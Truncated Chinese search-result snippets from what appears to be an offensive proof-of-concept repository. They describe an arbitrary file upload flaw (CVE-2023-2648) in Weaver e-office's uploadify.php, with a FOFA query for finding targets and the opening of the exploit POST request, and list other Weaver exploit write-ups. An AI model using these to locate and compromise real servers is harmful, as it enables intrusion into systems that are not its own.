泛微OA e-office平台uploadify.php处存在任意文件上传漏洞,攻击者通过漏洞可以获取服务器权限。 0x02漏洞复现 fofa:app="泛微-EOffice" 1.执行poc上传文件,并得到回显 1.上传poc: POST/inc/jquery/uploadify/uploadify.php HTTP/1.1Host: User-Agent: Mozilla/5.0(Macintosh; Intel Mac OS X 10_14_3) AppleW...
猫蛋儿安全团队编写的poc能报就能打。企业微信、海康、Metabase、Openfire、泛微OA... - 泛微E-Office Uploadify文件上传漏洞(CVE-2023-2648) · MD-SEC/MDPOCS@c07a0d9
泛微e-cology9接口XmlRpcServlet存在任意文件读取漏洞.md 泛微e-cology接口HrmService前台SQL注入漏洞.md 泛微e-cology接口getLabelByModule存在sql注入漏洞.md 泛微e-office 未授权访问.md 泛微e-office-mobile_upload_save存在任意文件上传漏洞.md 泛微e-office-uploadify.php存在任意文件上传漏洞....